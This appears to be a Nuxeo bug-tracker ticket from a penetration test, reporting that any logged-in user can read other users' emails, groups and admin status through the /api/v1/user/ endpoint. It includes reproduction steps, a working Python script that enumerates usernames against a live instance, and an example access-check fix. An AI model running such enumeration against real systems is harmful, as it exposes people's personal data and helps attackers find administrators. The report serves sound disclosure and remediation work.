Nuxeo Platform / NXP-32588

#PT22227_3 Sensitive Exposure of Data Belonging to Other Users


    Details

    • Type: Bug
    • Status: Open
    • Priority: Minor
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Security

      Description

      Criticality Justification
      An authenticated threat actor can query the /api/v1/user/ API path for arbitrary usernames and obtain confidential information about other system users: user names, the groups the user belongs to, email addresses and user permissions, among other attributes. The result is the unauthorized disclosure of this information.

      Steps To Reproduce
      After logging in with a low privilege user: (https://api.us.cobalt.io/v1/attachments/att_hW3Y1Ng/preview) (https://api.us.cobalt.io/v1/attachments/att_6ckiHpD/preview)
      A request is sent to the /nuxeo/api/v1/user/user-pentest-1 API endpoint, where user-pentest-1 is the user with which the platform was accessed. The response contains the personal information of the logged-in user: (https://api.us.cobalt.io/v1/attachments/att_o5jcwO7/preview)
      When this request is intercepted, the username in the URL can be changed to any other user on the platform, and the response contains that user's personal data, including that of administrators:
      a) pentest-admin (https://api.us.cobalt.io/v1/attachments/att_los7h7B/preview) (https://api.us.cobalt.io/v1/attachments/att_KZLa6zH/preview)
      b) pentest-admin-2 (https://api.us.cobalt.io/v1/attachments/att_15NjAzn/preview) (https://api.us.cobalt.io/v1/attachments/att_z4FNpvX/preview)
      Note that the same information is not reachable through the web front end: when an administrative user is looked up with the search engine, the /api/ path does not appear in the requests the browser makes, and attempting to open one of the administrative users results in a redirect followed by a 404 error. (https://api.us.cobalt.io/v1/attachments/att_ZGjVScd/preview) (https://api.us.cobalt.io/v1/attachments/att_6Lgk3lf/preview)
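      The enumeration described in the steps above, as an added example that is not part of the original report or of Nuxeo's code: it requests /nuxeo/api/v1/user/<name> for a list of candidate usernames as the low-privilege user and keeps every record that comes back with HTTP 200 and belongs to somebody else. The base URL and credentials passed to make_http_fetch() are placeholders, and the SAMPLE_RESPONSES used for the offline run are constructed in the shape of a Nuxeo user entity, not captured from a real instance.

```python
import base64
import json
import urllib.error
import urllib.parse
import urllib.request


def parse_user_entity(body):
    """Pull the fields the report lists (username, email, groups, admin flag) out of a
    Nuxeo user entity; returns None if the body is not a user entity."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    if not isinstance(data, dict) or data.get("entity-type") != "user":
        return None
    props = data.get("properties") or {}
    return {
        "username": props.get("username", data.get("id")),
        "email": props.get("email"),
        "groups": list(props.get("groups") or []),
        "isAdministrator": bool(data.get("isAdministrator", False)),
    }


def probe_users(fetch, requester, candidates):
    """Request each candidate's record as `requester` and keep only records that came
    back with HTTP 200 and describe somebody other than the requester."""
    leaked = {}
    for name in candidates:
        status, body = fetch(name)
        if status != 200:
            continue
        record = parse_user_entity(body)
        if record and record["username"] != requester:
            leaked[name] = record
    return leaked


def make_http_fetch(base_url, username, password):
    """Fetcher for a live instance: HTTP Basic auth against <base_url>/nuxeo/api/v1/user/<id>.
    base_url and the credentials are placeholders supplied by the tester."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()

    def fetch(target):
        url = f"{base_url}/nuxeo/api/v1/user/{urllib.parse.quote(target, safe='')}"
        req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode("utf-8", "replace")

    return fetch


# Constructed sample responses (not captured from a real instance), shaped like the
# Nuxeo user entity so the parser can be exercised offline.
SAMPLE_RESPONSES = {
    "user-pentest-1": (200, json.dumps({
        "entity-type": "user", "id": "user-pentest-1",
        "properties": {"username": "user-pentest-1", "email": "pentest1@example.invalid",
                       "groups": ["members"], "firstName": "", "lastName": "", "company": ""},
        "isAdministrator": False, "isAnonymous": False})),
    "pentest-admin": (200, json.dumps({
        "entity-type": "user", "id": "pentest-admin",
        "properties": {"username": "pentest-admin", "email": "admin@example.invalid",
                       "groups": ["administrators"], "firstName": "", "lastName": "", "company": ""},
        "isAdministrator": True, "isAnonymous": False})),
}


def sample_fetch(target):
    """Offline stand-in for make_http_fetch(); unknown names get a 404."""
    return SAMPLE_RESPONSES.get(target, (404, ""))


if __name__ == "__main__":
    found = probe_users(sample_fetch, "user-pentest-1",
                        ["user-pentest-1", "pentest-admin", "no-such-user"])
    for name, rec in found.items():
        print(f"{name}: email={rec['email']} groups={rec['groups']} admin={rec['isAdministrator']}")
```

      Against a live instance, replace sample_fetch with make_http_fetch(base_url, user, password); any name in the result is a record the low-privilege account should not have been able to read.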

      Suggested Fix
      1. Implement proper authorization and avoid object references that are easy to guess. Using globally unique identifiers (GUIDs, 128-bit identifiers that are for practical purposes unique when randomly generated) in place of predictable usernames makes references harder to enumerate, but this only reduces guessability and does not replace the access control check in point 2.
      2. Every use of a direct object reference taken from an untrusted source must include an access control check that the requesting user is authorized for the requested object.
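      An object-level check of the kind point 2 asks for, as an added example that is not part of the original report or of Nuxeo's code: the requester may read their own record, members of an administrators group may read any record, and everyone else is refused before the directory is consulted, so the response does not reveal whether the target username exists. The group name, the handler shape and the error bodies are assumptions made for the example.

```python
ADMIN_GROUP = "administrators"  # assumed name of the privileged group


def can_read_user(requester, requester_groups, target):
    """Authorization rule for GET /api/v1/user/{target}: self-read, or any read by an
    administrator. Unauthenticated callers (requester is None) are always refused."""
    if requester is None:
        return False
    return requester == target or ADMIN_GROUP in requester_groups


def handle_user_request(requester, requester_groups, target, lookup):
    """Mimics an HTTP handler: returns (status, body). The access check runs before
    `lookup(target)` so a refused caller cannot distinguish existing from missing users."""
    if not can_read_user(requester, requester_groups, target):
        return 403, {"entity-type": "exception", "status": 403, "message": "forbidden"}
    entity = lookup(target)
    if entity is None:
        return 404, {"entity-type": "exception", "status": 404, "message": "user not found"}
    return 200, entity


# Constructed directory standing in for the user manager.
DIRECTORY = {
    "user-pentest-1": {"entity-type": "user", "id": "user-pentest-1",
                       "properties": {"username": "user-pentest-1", "groups": ["members"]}},
    "pentest-admin": {"entity-type": "user", "id": "pentest-admin",
                      "properties": {"username": "pentest-admin", "groups": [ADMIN_GROUP]}},
}


def directory_lookup(name):
    return DIRECTORY.get(name)


if __name__ == "__main__":
    # The request from the report: a low-privilege user asking for an administrator.
    print(handle_user_request("user-pentest-1", ["members"], "pentest-admin", directory_lookup))
    # The same user reading their own record.
    print(handle_user_request("user-pentest-1", ["members"], "user-pentest-1", directory_lookup))
```

      Denying before the lookup matters: a handler that first resolves the user and only then checks access returns 404 for unknown names and 403 for real ones, which turns the endpoint into a username oracle even after the data disclosure is fixed.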

      Prerequisites
      Prior authentication with an active account on the service is required, regardless of privilege level.

      People

      • Assignee: Unassigned
      • Reporter: santony Sooraj Antony